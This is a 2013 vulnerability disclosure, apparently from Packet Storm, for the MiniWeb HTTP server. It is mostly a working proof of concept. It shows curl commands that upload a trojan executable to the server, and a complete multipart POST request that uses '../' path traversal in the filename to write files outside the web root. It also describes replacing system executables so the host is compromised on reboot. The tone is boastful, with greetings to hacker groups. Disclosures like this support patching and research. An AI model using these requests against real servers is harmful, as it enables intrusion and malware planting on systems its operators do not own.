MiniWeb File Upload / Directory Traversal

🗓️ 09 Apr 2013 00:00:00Reported by AkastepType
packetstorm🔗 packetstormsecurity.com👁 40 Views
MiniWeb HTTP server with low resource consumption, supports file uploading, and 7-zip decompression, vulnerable to remote arbitrary file upload and directory traversal on Windows XP SP2 32 bi
`============================================================================================  
Vulnerable Software: MiniWeb (build 300, built on Feb 28 2013)  
Official Site: http://miniweb.sourceforge.net/  
Vulns: Remote arbitrary file upload,Directory traversal.  
Tested Software/version: MiniWeb (build 300, built on Feb 28 2013)  
Tested on: Windows XP SP2 32 bit.  
=================================About software:===========================================  
MiniWeb is a mini HTTP server implementation written in C language, featuring low system resource consumption,  
high efficiency, good flexibility and high portability. It is capable to serve multiple clients with a single thread,  
supporting GET and POST methods, authentication,  
dynamic contents (dynamic web page and page variable substitution) and file uploading.  
MiniWeb runs on POSIX complaint OS, like Linux, as well as Microsoft Windows (Cygwin, MinGW and native build with Visual Studio).  
The binary size of MiniWeb can be as small as 20KB (on x86 Linux). The target of the project is to provide a fast,  
functional and low resource consuming HTTP server that is embeddable in other applications (as a static or dynamic library)  
as well as a standalone web server.  
  
MiniWeb supports transparent 7-zip decompression. Web contents can be compressed into  
7-zip archieves and clients can access the contents inside the 7-zip archive just like in a directory.  
  
MiniWeb can also be used in audio/video streaming applications,  
or more specific, VOD (video-on-demand) service. Currently a VOD client/server is being developed on MiniWeb.  
============================================================================================  
  
About vulns:  
This software suffers from 2 critical vulns:  
Any remote/local user can upload arbitrary files to web server.  
Proof of concept:  
  
In this scenario using cygwin +curl remote attacker uploads troyan called "taskmgr.exe" to remote web server.  
  
  
user@myhost /cygdrive/c/dir1/dir2  
$ ipconfig  
  
Íàñòðîéêà ïðîòîêîëà IP äëÿ Windows  
  
  
Ïîäêëþ÷åíèå ïî ëîêàëüíîé ñåòè - Ethernet àäàïòåð:  
  
Ñîñòîÿíèå ñåòè . . . . . . . . . : ñåòü îòêëþ÷åíà  
  
VirtualBox Host-Only Network - Ethernet àäàïòåð:  
  
DNS-ñóôôèêñ ýòîãî ïîäêëþ÷åíèÿ . . :  
IP-àäðåñ . . . . . . . . . . . . : 192.168.0.1  
Ìàñêà ïîäñåòè . . . . . . . . . . : 255.255.255.0  
Îñíîâíîé øëþç . . . . . . . . . . : 192.168.0.1  
  
user@myhost /cygdrive/c/dir1/dir2  
$ curl -I 192.168.0.15:8000  
curl: (52) Empty reply from server  
  
user@myhost /cygdrive/c/dir1/dir2  
$ curl 192.168.0.15:8000  
<html><head><title>/</title></head><body><table border=0 cellpadding=0 cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td  
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></  
table><hr><i>Directory content generated by MiniWeb</i></body></html>  
user@myhost /cygdrive/c/dir1/dir2  
  
$ #Uploading remotely our troyan to remote system.  
  
user@myhost /cygdrive/c/dir1/dir2  
$ curl -i -F name=taskmgr.exe -F [email protected] http://192.168.0.15:8000/epicfail/  
HTTP/1.1 404 Not Found  
Server: MiniWeb  
Content-length: 125  
Content-Type: text/html  
  
<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL has no content.</p></body></html>  
user@myhost /cygdrive/c/dir1/dir2  
$ #Now fetching directory index from remote system.  
  
user@myhost /cygdrive/c/dir1/dir2  
$ curl 192.168.0.15:8000  
<html><head><title>/</title></head><body><table border=0 cellpadding=0 cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td  
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t  
r><td width=35%><a href='taskmgr.exe'>taskmgr.exe</a></td><td width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013  
00:14:38 GMT</td></tr></table><hr><i>Directory content generated by MiniWeb</i></body></html>  
user@myhost /cygdrive/c/dir1/dir2  
user@myhost /cygdrive/c/dir1/dir2  
  
$ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design flaw.  
  
user@myhost /cygdrive/c/dir1/dir2  
$ curl 192.168.0.15:8000/taskmgr.exe>task2.exe  
  
  
user@myhost /cygdrive/c/dir1/dir2  
$ file task2.exe  
task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed  
  
user@myhost /cygdrive/c/dir1/dir2  
$ rm -rf task2.exe  
  
  
So,this means any remote user can upload,can spoof,can overwrite any files on remote server.  
  
Moreover this web server software contains directory traversal vuln.  
Using the second vuln this is possible to upload any troyan outside of document root to Operation System + spoof some system executables and as result  
compromise remote operation system in eg on next reboot when it starts.  
In this case attacker uses FIddler:  
  
================================================================================  
METHOD: POST  
URL: http://192.168.0.15:8000/AAAAAAAAAAAAAAAAAAAAAAA  
  
Host: 192.168.0.15:8000  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------78522398122376  
Content-Length: 84906  
  
  
request body:  
  
  
-----------------------------78522398122376  
Content-Disposition: form-data; name="user"  
  
-----------------------------78522398122376  
Content-Disposition: form-data; name="pass"  
  
-----------------------------78522398122376  
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"  
Content-Type: image/png  
  
Dude! Your machine OwnEd!  
  
-----------------------------78522398122376  
Content-Disposition: form-data; name="button"  
  
Upload  
-----------------------------78522398122376--  
  
================================================================================  
  
Few Printscreens:  
  
1remotesystem.PNG  
  
http://s019.radikal.ru/i612/1304/09/510e3b430b04.png  
  
  
  
  
2attackersends.PNG  
  
http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png  
  
  
3remotesystempwned.PNG  
  
  
http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png  
  
  
  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
itsecuritysolutions.org  
waraxe.us  
exploit-db.com  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers+ ottoman38 & HERO_AZE  
  
*Super special KUDOS to my bro Brendan Coles!  
Love you and Respect you dude!  
Thank you!*  
================================================  
  
/AkaStep  
  
  
  
  
`
09 Apr 2013 00:00Current
0.2Low risk
Vulners AI Score0.2